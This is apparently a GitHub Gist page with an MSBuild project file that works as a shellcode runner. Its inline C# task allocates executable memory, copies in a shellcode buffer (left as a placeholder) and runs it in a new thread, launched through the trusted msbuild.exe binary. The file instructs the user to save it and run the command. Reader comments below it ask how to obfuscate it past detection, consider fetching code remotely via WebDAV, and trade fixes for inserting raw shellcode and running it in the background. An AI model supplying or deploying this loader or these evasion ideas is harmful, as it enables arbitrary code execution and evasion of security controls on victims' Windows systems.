-
-
Save ConsciousHacker/5fce0343f29085cd9fba466974e43f17 to your computer and use it in GitHub Desktop.
MSBuild Shellcode Runner
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes shellcode. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj --> | |
| <!-- Save This File And Execute The Above Command --> | |
| <!-- Author: Casey Smith, Twitter: @subTee --> | |
| <!-- License: BSD 3-Clause --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask | |
| TaskName="ClassExample" | |
| TaskFactory="CodeTaskFactory" | |
| AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
| <Task> | |
| <Code Type="Class" Language="cs"> | |
| <![CDATA[ | |
| using System; | |
| using System.Runtime.InteropServices; | |
| using Microsoft.Build.Framework; | |
| using Microsoft.Build.Utilities; | |
| public class ClassExample : Task, ITask | |
| { | |
| private static UInt32 MEM_COMMIT = 0x1000; | |
| private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; | |
| [DllImport("kernel32")] | |
| private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, | |
| UInt32 size, UInt32 flAllocationType, UInt32 flProtect); | |
| [DllImport("kernel32")] | |
| private static extern IntPtr CreateThread( | |
| UInt32 lpThreadAttributes, | |
| UInt32 dwStackSize, | |
| UInt32 lpStartAddress, | |
| IntPtr param, | |
| UInt32 dwCreationFlags, | |
| ref UInt32 lpThreadId | |
| ); | |
| [DllImport("kernel32")] | |
| private static extern UInt32 WaitForSingleObject( | |
| IntPtr hHandle, | |
| UInt32 dwMilliseconds | |
| ); | |
| public override bool Execute() | |
| { | |
| byte[] shellcode = new byte[] { INSERT_SHELLCODE_HERE }; | |
| UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, | |
| MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
| Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); | |
| IntPtr hThread = IntPtr.Zero; | |
| UInt32 threadId = 0; | |
| IntPtr pinfo = IntPtr.Zero; | |
| hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); | |
| WaitForSingleObject(hThread, 0xFFFFFFFF); | |
| return true; | |
| } | |
| } | |
| ]]> | |
| </Code> | |
| </Task> | |
| </UsingTask> | |
| </Project> |
This gets detected straight away
How do we obsufucate this any further?
Like hosting the cs code remotely and fetching it inside the xml file via a webdav server?
but I guess defenders can hunt for this by checking TCP connections made by MSBuild.exe
This gets detected straight away
Have you had a way around it?
Have you had a way around it?
Negative.
Inserting raw shell code inside that container never seems to work for me. Should we be including buf = new byte[419] ?
remove the buf length from [] -
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This froze the terminal, how could I run this script in background in windows?